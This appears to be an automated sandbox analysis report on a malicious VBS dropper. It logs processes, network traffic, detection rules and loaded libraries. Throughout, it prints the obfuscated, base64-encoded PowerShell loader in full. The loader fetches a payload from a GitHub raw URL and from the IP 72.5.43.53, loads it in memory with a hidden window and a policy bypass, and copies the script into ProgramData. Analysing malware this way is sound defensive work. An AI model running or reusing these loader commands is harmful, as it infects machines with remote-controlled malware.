([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', 
'+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdO
No Suricata rule has matched

AV Detection

Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | Virustotal: Detection: 6%
Source: WW8kzvnphl.vbs | ReversingLabs: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.9% probability
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb[ source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbpdb` source: powershell.exe, 00000003.00000002.2202319158.0000022A9B4E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: autopatia.vbs.4.dr Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: autopatia.vbs.4.dr Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: global traffic HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1 Host: 72.5.43.53 Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.53
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.53(
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.53/450/RRCFG.txt
Source: powershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94DCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94D87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2171869287.0000022A844FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A848D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtQLe;
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: WW8kzvnphl.vbsInitial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@11/7@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvp2ytn3.kpy.ps1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WW8kzvnphl.vbsReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
